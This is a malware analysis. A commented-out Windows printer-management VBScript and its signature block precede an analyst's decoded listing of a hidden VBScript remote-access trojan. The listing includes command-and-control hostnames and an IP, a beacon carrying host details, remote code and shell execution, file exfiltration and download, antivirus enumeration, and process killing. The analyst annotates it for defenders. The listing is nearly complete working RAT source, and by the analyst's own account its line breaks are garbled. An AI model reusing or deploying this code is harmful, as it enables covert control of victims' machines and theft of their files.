' str = str + L_Text_Msg_Status16_Text + L_Space_Text
'
' case 17
' str = str + L_Text_Msg_Status17_Text + L_Space_Text
'
' case 18
' str = str + L_Text_Msg_Status18_Text + L_Space_Text
'
' end select
'
' ExtPrnStatusToString = str
'
'end function
'
''
'' Converts the detected error state to a string
''
'function DetectedErrorStateToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 0
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status20_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status21_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status22_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status23_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status24_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status25_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status26_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status27_Text + L_Space_Text
'
' end select
'
' DetectedErrorStateToString = str
'
'end function
'
''
'' Converts the extended detected error state to a string
''
'function ExtDetectedErrorStateToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 0
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status20_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status21_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status22_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status23_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status24_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status25_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status26_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status27_Text + L_Space_Text
'
' case 12
' str = str + L_Text_Msg_Status28_Text + L_Space_Text
'
' case 13
' str = str + L_Text_Msg_Status29_Text + L_Space_Text
'
' case 14
' str = str + L_Text_Msg_Status30_Text + L_Space_Text
'
' case 15
' str = str + L_Text_Msg_Status31_Text + L_Space_Text
'
' case 16
' str = str + L_Text_Msg_Status32_Text + L_Space_Text
'
' end select
'
' ExtDetectedErrorStateToString = str
'
'end function
'
''
'' Debug display helper function
''
'sub DebugPrint(uFlags, strString)
'
' if gDebugFlag = true then
'
' if uFlags = kDebugTrace then
'
' 'wscript.echo L_Debug_Text & L_Space_Text & strString
'
' end if
'
' if uFlags = kDebugError then
'
' if Err <> 0 then
'
' 'wscript.echo L_Debug_Text & L_Space_Text & strString & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) _
' & L_Space_Text & Err.Description
'
' end if
'
' end if
'
' end if
'
'end sub
'
''
'' Parse the command line into its components
''
'function ParseCommandLine(iAction, oParamdict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg05_Text
'
' dim oArgs
' dim iIndex
'
' iAction = kActionUnknown
' iIndex = 0
'
' set oArgs = wscript.Arguments
'
' while iIndex < oArgs.Count
'
' select case oArgs(iIndex)
'
' case "-g"
' iAction = kActionGet
'
' case "-t"
' iAction = kActionSet
'
' case "-x"
' iAction = kActionRename
'
' case "-p"
' iIndex = iIndex + 1
' oParamdict.Add kPrinterName, oArgs(iIndex)
'
' case "-s"
' iIndex = iIndex + 1
' oParamdict.Add kServerName, RemoveBackslashes(oArgs(iIndex))
'
' case "-r"
' iIndex = iIndex + 1
' oParamdict.Add kPortName, oArgs(iIndex)
'
' case "-h"
' iIndex = iIndex + 1
' oParamdict.Add kShareName, oArgs(iIndex)
'
' case "-m"
' iIndex = iIndex + 1
' oParamdict.Add kComment, oArgs(iIndex)
'
' case "-l"
' iIndex = iIndex + 1
' oParamdict.Add kLocation, oArgs(iIndex)
'
' case "-y"
' iIndex = iIndex + 1
' oParamdict.Add kDataType, oArgs(iIndex)
'
' case "-f"
' iIndex = iIndex + 1
' oParamdict.Add kSepFile, oArgs(iIndex)
'
' case "-z"
' iIndex = iIndex + 1
' oParamdict.Add kNewPrinterName, oArgs(iIndex)
'
' case "-u"
' iIndex = iIndex + 1
' oParamdict.Add kUserName, oArgs(iIndex)
'
' case "-w"
' iIndex = iIndex + 1
' oParamdict.Add kPassword, oArgs(iIndex)
'
' case "-st"
' iIndex = iIndex + 1
' oParamdict.Add kStartTime, "********" & oArgs(iIndex) & "00.000000+000"
'
' case "-o"
' iIndex = iIndex + 1
' oParamdict.Add kPriority, oArgs(iIndex)
'
' case "-i"
' iIndex = iIndex + 1
' oParamdict.Add kDefaultPriority, oArgs(iIndex)
'
' case "-ut"
' iIndex = iIndex + 1
' oParamdict.Add kUntilTime, "********" & oArgs(iIndex) & "00.000000+000"
'
' case "-queued"
' oParamdict.Add kQueued, false
'
' case "+queued"
' oParamdict.Add kQueued, true
'
' case "-direct"
' oParamdict.Add kDirect, false
'
' case "+direct"
' oParamdict.Add kDirect, true
'
' case "-shared"
' oParamdict.Add kShared, false
'
' case "+shared"
' oParamdict.Add kShared, true
'
' case "-hidden"
' oParamdict.Add kHidden, false
'
' case "+hidden"
' oParamdict.Add kHidden, true
'
' case "-enabledevq"
' oParamdict.Add kEnabledevq, false
'
' case "+enabledevq"
' oParamdict.Add kEnabledevq, true
'
' case "-keepprintedjobs"
' oParamdict.Add kKeepprintedjobs, false
'
' case "+keepprintedjobs"
' oParamdict.Add kKeepprintedjobs, true
'
' case "-docompletefirst"
' oParamdict.Add kDocompletefirst, false
'
' case "+docompletefirst"
' oParamdict.Add kDocompletefirst, true
'
' case "-workoffline"
' oParamdict.Add kWorkoffline, false
'
' case "+workoffline"
' oParamdict.Add kWorkoffline, true
'
' case "-enablebidi"
' oParamdict.Add kEnablebidi, false
'
' case "+enablebidi"
' oParamdict.Add kEnablebidi, true
'
' case "-rawonly"
' oParamdict.Add kRawonly, false
'
' case "+rawonly"
' oParamdict.Add kRawonly, true
'
' case "-published"
' oParamdict.Add kPublished, false
'
' case "+published"
' oParamdict.Add kPublished, true
'
' case "-?"
' Usage(true)
' exit function
'
' case else
' Usage(true)
' exit function
'
' end select
'
' iIndex = iIndex + 1
'
' wend
'
' if Err = kErrorSuccess then
'
' ParseCommandLine = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Error_General02_Text & L_Space_Text & L_Error_Text & L_Space_Text _
' & L_Hex_Text & hex(Err.Number) & L_Space_text & Err.Description
'
' ParseCommandLine = kErrorFailure
'
' end if
'
'end function
'
''
'' Display command usage.
''
'sub Usage(bExit)
'
'
'
' if bExit then
'
' wscript.quit(1)
'
' end if
'
'end sub
'
''
'' Determines which program is being used to run this script.
'' Returns true if the script host is cscript.exe
''
'function IsHostCscript()
'
' on error resume next
'
' dim strFullName
' dim strCommand
' dim i, j
' dim bReturn
'
' bReturn = false
'
' strFullName = WScript.FullName
'
' i = InStr(1, strFullName, ".exe", 1)
'
' if i <> 0 then
'
' j = InStrRev(strFullName, "\", i, 1)
'
' if j <> 0 then
'
' strCommand = Mid(strFullName, j+1, i-j-1)
'
' if LCase(strCommand) = "cscript" then
'
' bReturn = true
'
' end if
'
' end if
'
' end if
'
' if Err <> 0 then
'
' 'wscript.echo L_Text_Error_General01_Text & L_Space_Text & L_Error_Text & L_Space_Text _
' & L_Hex_Text & hex(Err.Number) & L_Space_Text & Err.Description
'
' end if
'
' IsHostCscript = bReturn
'
'end function
'
''
'' Retrieves extended information about the last error that occurred
'' during a WBEM operation. The methods that set an SWbemLastError
'' object are GetObject, PutInstance, DeleteInstance
''
'sub LastError()
'
' on error resume next
'
' dim oError
'
' set oError = CreateObject("WbemScripting.SWbemLastError")
'
' if Err = kErrorSuccess then
'
' 'wscript.echo L_Operation_Text & L_Space_Text & oError.Operation
' 'wscript.echo L_Provider_Text & L_Space_Text & oError.ProviderName
' 'wscript.echo L_Description_Text & L_Space_Text & oError.Description
' 'wscript.echo L_Text_Error_General03_Text & L_Space_Text & oError.StatusCode
'
' end if
'
'end sub
'
''
'' Connects to the WMI service on a server. oService is returned as a service
'' object (SWbemServices)
''
'function WmiConnect(strServer, strNameSpace, strUser, strPassword, oService)
'
' on error resume next
'
' dim oLocator
' dim bResult
'
' oService = null
'
' bResult = false
'
' set oLocator = CreateObject("WbemScripting.SWbemLocator")
'
' if Err = kErrorSuccess then
'
' set oService = oLocator.ConnectServer(strServer, strNameSpace, strUser, strPassword)
'
' if Err = kErrorSuccess then
'
' bResult = true
'
' oService.Security_.impersonationlevel = 3
'
' '
' ' Required to perform administrative tasks on the spooler service
' '
' oService.Security_.Privileges.AddAsString "SeLoadDriverPrivilege"
'
' Err.Clear
'
' else
'
' 'wscript.echo L_Text_Msg_General08_Text & L_Space_Text & L_Error_Text _
' & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General09_Text & L_Space_Text & L_Error_Text _
' & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' WmiConnect = bResult
'
'end function
'
''
'' Remove leading "\\" from server name
''
'function RemoveBackslashes(strServer)
'
' dim strRet
'
' strRet = strServer
'
' if Left(strServer, 2) = "\\" and Len(strServer) > 2 then
'
' strRet = Mid(strServer, 3)
'
' end if
'
' RemoveBackslashes = strRet
'
'end function
'
'
'' SIG '' Begin signature block
''' SIG '' MIIZMAYJKoZIhvcNAQcCoIIZITCCGR0CAQExDjAMBggq
''' SIG '' hkiG9w0CBQUAMGYGCisGAQQBgjcCAQSgWDBWMDIGCisG
''' SIG '' AQQBgjcCAR4wJAIBAQQQTvApFpkntU2P5azhDxfrqwIB
''' SIG '' AAIBAAIBAAIBAAIBADAgMAwGCCqGSIb3DQIFBQAEEOLm
''' SIG '' 4j+9BLdGEED7+fyvFSygghQ4MIICvDCCAiUCEEoZ0jiM
''' SIG '' glkcpV1zXxVd3KMwDQYJKoZIhvcNAQEEBQAwgZ4xHzAd
''' SIG '' BgNVBAoTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxFzAV
''' SIG '' BgNVBAsTDlZlcmlTaWduLCBJbmMuMSwwKgYDVQQLEyNW
''' SIG '' ZXJpU2lnbiBUaW1lIFN0YW1waW5nIFNlcnZpY2UgUm9v
''' SIG '' dDE0MDIGA1UECxMrTk8gTElBQklMSVRZIEFDQ0VQVEVE
''' SIG '' LCAoYyk5NyBWZXJpU2lnbiwgSW5jLjAeFw05NzA1MTIw
''' SIG '' MDAwMDBaFw0wNDAxMDcyMzU5NTlaMIGeMR8wHQYDVQQK
''' SIG '' ExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMRcwFQYDVQQL
''' SIG '' Ew5WZXJpU2lnbiwgSW5jLjEsMCoGA1UECxMjVmVyaVNp
''' SIG '' Z24gVGltZSBTdGFtcGluZyBTZXJ2aWNlIFJvb3QxNDAy
''' SIG '' BgNVBAsTK05PIExJQUJJTElUWSBBQ0NFUFRFRCwgKGMp
''' SIG '' OTcgVmVyaVNpZ24sIEluYy4wgZ8wDQYJKoZIhvcNAQEB
''' SIG '' BQADgY0AMIGJAoGBANMuIPBofCwtLoEcsQaypwu3EQ1X
''' SIG '' 2lPYdePJMyqy1PYJWzTz6ZD+CQzQ2xtauc3n9oixncCH
''' SIG '' Z0JIppAQ5L9h+JxT5ZPRcz/4/Z1PhKxV0f0RY2MwggQC
''' SIG '' MIIDa6ADAgECAhAIem1cb2KTT7rE/UPhFBidMA0GCSqG
''' SIG '' SIb3DQEBBAUAMIGeMR8wHQYDVQQKExZWZXJpU2lnbiBU
''' SIG '' cnVzdCBOZXR3b3JrMRcwFQYDVQQLEw5WZXJpU2lnbiwg
''' SIG '' SW5jLjEsMCoGA1UECxMjVmVyaVNpZ24gVGltZSBTdGFt
''' SIG '' cGluZyBTZXJ2aWNlIFJvb3QxNDAyBgNVBAsTK05PIExJ
''' SIG '' QUJJTElUWSBBQ0NFUFRFRCwgKGMpOTcgVmVyaVNpZ24s
''' SIG '' IEluYy4wHhcNMDEwMjI4MDAwMDAwWhcNMDQwMTA2MjM1
''' SIG '' OTU5WjCBoDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4x
''' SIG '' HzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsx
''' SIG '' OzA5BgNVBAsTMlRlcm1zIG9mIHVzZSBhdCBodHRwczov
...
''' SIG '' vSRK4Mpa/gWTKBapOlzdKcI=
''' SIG '' End signature block
End Function
</script>
</registration>
</scriptlet>
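## Decodes to (the VBScript payload recovered from the encoded numeric string at the top of the <script> block; the apostrophe-prefixed printer-script text and signature block shown above are comments and do not execute):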
' Analyst note: decoded payload entry point. The line breaks in this listing are a
' formatter artefact ("end" / "if", "select" / "case" and "< >" are split across
' tokens), so the text does not parse as printed; read it for behaviour only.
' NOTE(review): the verb set, the "is-ready" beacon and the "<|>" delimiter resemble the
' publicly documented H-Worm (Houdini) VBS RAT - confirm before attributing.
'
' Command-and-control endpoints, all on TCP port 535. The main loop rotates through
' this array whenever a beacon does not return HTTP 200.
host = array("mighty-dead.ddns.net:535", "149.28.14.103:535", "mighty-dead.spdns.de:535")
' COM objects used throughout: shell (process launch, env vars), filesystem, HTTP client.
dim r7
set r7 = createobject("wscript.shell")
dim w1
set w1 = createobject("scripting.filesystemobject")
dim x3
set x3 = createobject("msxml2.xmlhttp")
' Field separator for every message in both directions: the literal string <|>
spliter = "<" & "|" & ">"
dim n9
dim i8
dim wd
info = ""
usbspreading = ""
startdate = ""
dim u9
' Index of the host entry currently in use.
dns = 0
' Errors are suppressed from here on, so a failing handler does not stop the loop.
on error resume next
' o7 (and i5 below) are called but not defined in the visible listing.
o7
while true
i5
n9 = ""
' Beacon: POST the host-profile string built by b9 to /is-ready over plain HTTP.
' The response body is treated as the next command.
n9 = o4("is-ready", b9)
' Any status other than 200 advances to the next endpoint, wrapping back to index 0.
if x3.status < > 200 then
if dns >= ubound(host) then
dns = 0
else
dns = dns + 1
end
if
end
if
' Split the reply on <|>; field 0 is the verb, the remaining fields are its arguments.
i8 = split(n9, spliter)
select
case i8(0)
' Passes server-supplied text to Execute, i.e. arbitrary VBScript runs in this process.
case "excecute"
wd = i8(1)
execute wd
' Overwrites the installed copy (installdir & installname) with server-supplied text, then exits.
' installdir and installname are not assigned anywhere in the visible listing.
case "update"
wd = i8(1)
u9.close
set u9 = w1.opentextfile(installdir & installname, 2, false)
u9.write wd
u9.close
wscript.quit
' c8 is not defined in the visible listing.
case "uninstall"
c8
' r3 fetches a file from the current endpoint and writes it to disk.
case "send"
r3 i8(1), i8(2)
' v4 is not defined in the visible listing.
case "site-send"
v4 i8(1), i8(2)
' p9 reads a local file and POSTs its contents to the endpoint.
case "recv"
wd = i8(1)
p9(wd)
' The three enum-* verbs return drive, directory and process listings.
case "enum-driver"
o4 "is-enum-driver", x8
case "enum-faf"
wd = i8(1)
o4 "is-enum-faf", g2(wd)
case "enum-process"
o4 "is-enum-process", w2
' g7 runs the supplied string through %comspec% /c and the output is posted back.
case "i8-shell"
wd = i8(1)
o4 "is-i8-shell", g7(wd)
' s3 deletes the named file or folder.
case "delete"
wd = i8(1)
s3(wd)
' p2 force-kills the given PID with taskkill.
case "exit-process"
wd = i8(1)
p2(wd)
' k7 and w4 are not defined in the visible listing, so the screen-shot and password
' handlers cannot be assessed from this page.
case "screen-shot"
k7 i8(1), i8(2), i8(3)
case "password"
w4
' Calls c8, the same routine the "uninstall" verb calls.
case "keylogger"
c8
end select
wend
' Sends one message to the current endpoint and returns the reply body.
'   i8 - message verb; it becomes the URL path (for example "is-ready")
'   wd - request body
' The request is a synchronous (third argument false) HTTP POST to
' http://<host(dns)>/<verb>. It is plain HTTP, so verb and body are visible to
' network inspection; POSTs from a script host to port 535 with these paths are a
' usable network detection point.
function o4(i8, wd)
o4 = wd
x3.open "post", "http://" & host(dns) & "/" & i8, false
x3.send wd
' The return value set above is replaced by the server's response text.
o4 = x3.responsetext
end
function
' Builds the host-profile string sent with every "is-ready" beacon.
' Fields, joined by spliter, in order: value from c0 (a disk volume serial number),
' %computername%, %username%, OS caption from Win32_OperatingSystem, the literal
' "plus", the string from o1 (installed antivirus display names), and usbspreading.
' The result is kept in inf and reused when inf is already non-empty.
' Errors are suppressed, so a failed WMI query leaves its field out rather than stopping.
function b9
on error resume next
if inf = ""
then
inf = c0 & spliter
inf = inf & r7.expandenvironmentstrings("%computername%") & spliter
inf = inf & r7.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery("select * from win32_operatingsystem")
' Only the first returned OS instance is used.
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit
for
next
inf = inf & "plus" & spliter
inf = inf & o1 & spliter
inf = inf & usbspreading
b9 = inf
else
b9 = inf
end
if
end
function
' Copies the running script file to installdir & installname, overwriting any
' existing file (third argument true). Errors are suppressed.
' installdir and installname are not assigned in the visible listing, so the
' install location cannot be determined from this page.
sub h4()
on error resume Next
w1.copyfile wscript.scriptfullname, installdir & installname, true
end sub
' Returns the VolumeSerialNumber of the first Win32_LogicalDisk instance that has a
' non-empty one, queried through WMI (root\cimv2).
' b9 uses the value as the first field of the beacon - presumably as a per-host
' identifier; confirm against server-side handling if available.
function c0
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber < > ""
then
c0 = disk.volumeserialnumber
exit
for
end
if
next
end
function
' Reports which antivirus products are registered on the host.
' Reads the OS version from Win32_OperatingSystem, chooses the WMI namespace
' root\securitycenter2 when the computed version is greater than 6 and
' root\securitycenter otherwise, then concatenates the displayname of every
' antivirusproduct instance. Returns "nan-av" when nothing was collected.
' Defender note: queries against the securitycenter namespaces from a script host are
' uncommon in normal administration and can be monitored through WMI activity logging.
function o1
on error resume next
o1 = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem", , 48)
for each v3 in colitems
versionstr = split(v3.version, ".")
next
versionstr = split(colitems.version, ".")
' Rebuilds the version as "<major>.<rest>" and converts it to a number with eval.
osversion = versionstr(0) & "."
for z1 = 1 to ubound(versionstr)
osversion = osversion & versionstr(i)
next
osversion = eval(osversion)
if osversion > 6 then sc = "securitycenter2"
else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct", "wql", 0) for each objantivirus in colantivirus o1 = o1 & objantivirus.displayname & " ."
next
if o1 = ""
then o1 = "nan-av"
end
function
' Handler for the "send" verb: pulls a file from the endpoint and writes it to disk.
'   a4 - remote file path; the part after the last backslash becomes the local file name
'   q8 - destination directory; installdir is used when it is empty
' Steps visible below: POST to http://<host(dns)>/is-sending<|><a4> on a new
' msxml2.xmlhttp object, delete any existing file at the target path, and on HTTP 200
' write the response body through an adodb.stream opened in binary mode (.type = 1).
' The lines that would run the saved file are commented out in this sample, so this
' routine only drops the file.
' Defender note: adodb.stream SaveToFile from a script host, followed by a new file
' appearing under the install directory, is a host-side detection point.
sub r3(a4, q8) if q8 = ""
then q8 = installdir end
if strsaveto = q8 & mid(a4, instrrev(a4, "\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post", "http://" & host(dns) & "/" & "is-sending" & spliter & a4, false objhttpdownload.send ""
set objfsodownload = createobject("scripting.filesystemobject") if objfsodownload.fileexists(strsaveto) then objfsodownload.deletefile(strsaveto) end
if if objhttpdownload.status = 200 then dim g0 set g0 = createobject("adodb.stream") with g0
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close end with set g0 = nothing end
if 'if objfsodownload.fileexists(strsaveto) then
'r7.run objfsodownload.getfile (strsaveto).shortpath
'end if
end sub
' Handler for the "recv" verb: reads the local file a4 in binary mode through
' adodb.stream and POSTs its contents to the endpoint via o4, using the path
' "is-recving<|><a4>". This is the file-exfiltration path of the sample.
' No "on error resume next" appears inside this routine.
' Defender note: the local file path is carried in the request URL over plain HTTP, so
' proxy or network logs can show which files were taken.
function p9(a4) dim t2, x5 set t2 = createobject("adodb.stream") with t2
.type = 1
.open
.loadfromfile a4 x5 = .read
.close end with set g0 = nothing o4 "is-recving" & spliter & a4, x5 end
function
' Handler data for the "enum-driver" verb: returns one "<path>|<drivetype>" record,
' terminated by spliter, for every drive that reports isready = true.
function x8() for each drive in w1.drives
if drive.isready = true then x8 = x8 & drive.path & "|" & drive.drivetype & spliter end
if next end Function
' Handler data for the "enum-faf" verb: directory listing of the folder l0.
' Output starts with the folder path, then one record per entry, each terminated by
' spliter: subfolders as "<name>||d|<attributes>", files as "<name>|<size>|f|<attributes>".
' No "on error resume next" appears inside this routine.
function g2(l0) g2 = l0 & spliter
for each folder in w1.getfolder(l0).subfolders g2 = g2 & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter next
for each file in w1.getfolder(l0).files g2 = g2 & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter next end
function
' Three routines share these lines because of the listing's broken line breaks.
' w2 - data for "enum-process": queries Win32_Process through WMI and returns
'      "<name>|<processid>|<executablepath>" records terminated by spliter.
' p2 - handler for "exit-process": runs taskkill /F /T /PID <b1> with window style 7
'      (minimised, not activated) and waits for it to finish. b1 is concatenated into
'      the command line as received from the server.
' s3 - handler for "delete": calls both deletefile and deletefolder on the path i1.
' All three suppress errors.
' Defender note: taskkill launched by the process hosting this script, especially
' against security tooling PIDs, is worth alerting on in process-creation telemetry.
function w2() on error resume next set objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process", , 48) dim v3
for each v3 in colitems w2 = w2 & v3.name & "|"
w2 = w2 & v3.processid & "|"
w2 = w2 & v3.executablepath & spliter next end
function sub p2(b1) on error resume next r7.run "taskkill /F /T /PID " & b1, 7, true end sub sub s3(i1) on error resume next w1.deletefile i1 w1.deletefolder i1 end sub
' Handler data for the "i8-shell" verb: remote command execution.
' Runs "%comspec% /c <i8>" through wscript.shell Exec, where i8 is the string
' received from the server, and returns stdout if it has data, otherwise stderr,
' otherwise an empty string. The main loop posts the result back as "is-i8-shell".
' The local "dim x3" shadows the global HTTP object inside this function; it is not
' used here.
' Defender note: the command interpreter appearing as a child of the process that
' hosts this script is the primary process-creation indicator for this capability.
function g7(i8) dim x3, c2, t_ set c2 = r7.exec("%comspec% /c " & i8) if not c2.stdout.atendofstream then t_ = c2.stdout.readall elseif not c2.stderr.atendofstream then t_ = c2.stderr.readall
else
t_ = ""
end
if g7 = t_ end Function